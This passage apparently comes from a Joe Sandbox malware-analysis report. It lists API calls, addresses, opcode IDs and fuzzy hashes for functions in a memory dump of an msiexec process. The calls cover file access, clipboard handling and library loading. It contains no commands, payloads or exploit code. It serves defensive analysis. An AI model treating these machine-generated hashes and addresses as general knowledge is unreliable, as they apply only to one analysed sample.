                                                                                            • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                            • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                            • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                            • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                            • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                            • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                            • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                            • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                            • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                            • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                            • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                            • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                            • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                            • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                            • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                            • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                            APIs
                                                                                            • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnumNamesResource
                                                                                            • String ID:
                                                                                            • API String ID: 3334572018-0
                                                                                            • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                            • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                            • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                            • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                            • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                            • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                            • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                            APIs
                                                                                            • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseFind
                                                                                            • String ID:
                                                                                            • API String ID: 1863332320-0
                                                                                            • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                            • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                            • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                            • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                            • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                            • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                            • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                            • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                            • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                            • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004095FC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                              • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                              • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 3655998216-0
                                                                                            • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                            • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                            • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                            • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00445426
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                            • String ID:
                                                                                            • API String ID: 1828521557-0
                                                                                            • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                            • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                            • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                            • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp
                                                                                            • String ID:
                                                                                            • API String ID: 2081463915-0
                                                                                            • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                            • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                            • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                            • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                            APIs
                                                                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateErrorHandleLastRead
                                                                                            • String ID:
                                                                                            • API String ID: 2136311172-0
                                                                                            • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                            • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                            • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                            • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                            APIs
                                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@
                                                                                            • String ID:
                                                                                            • API String ID: 1936579350-0
                                                                                            • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                            • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                            • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                            • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                            • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                            • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                            • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                            • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                            • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                            • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                            • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                            • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                            • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                            APIs
                                                                                            • EmptyClipboard.USER32 ref: 004098EC
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                            • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                            • GetLastError.KERNEL32 ref: 0040995D
                                                                                            • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                            • GetLastError.KERNEL32 ref: 00409974
                                                                                            • CloseClipboard.USER32 ref: 0040997D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 3604893535-0
                                                                                            • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                            • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                            • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                            • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                            APIs
                                                                                            • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                            • API String ID: 2780580303-317687271
                                                                                            • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                            • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                            • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                            • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                            APIs
                                                                                            • EmptyClipboard.USER32 ref: 00409882
                                                                                            • wcslen.MSVCRT ref: 0040988F
                                                                                            • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                            • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                            • CloseClipboard.USER32 ref: 004098D7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                            • String ID:
                                                                                            • API String ID: 1213725291-0
                                                                                            • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                            • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                            • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                            • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32 ref: 004182D7
                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                            • LocalFree.KERNEL32(?), ref: 00418342
                                                                                            • free.MSVCRT ref: 00418370
                                                                                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                            • String ID: OsError 0x%x (%u)
                                                                                            • API String ID: 2360000266-2664311388
                                                                                            • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                            • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                            • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                            • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@memcpymemset
                                                                                            • String ID:
                                                                                            • API String ID: 1865533344-0
                                                                                            • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                            • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                            • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                            • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                            • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                            • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                            • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                            APIs
                                                                                            • _wcsicmp.MSVCRT ref: 004022A6
                                                                                            • _wcsicmp.MSVCRT ref: 004022D7
                                                                                            • _wcsicmp.MSVCRT ref: 00402305
                                                                                            • _wcsicmp.MSVCRT ref: 00402333
                                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                            • memset.MSVCRT ref: 0040265F
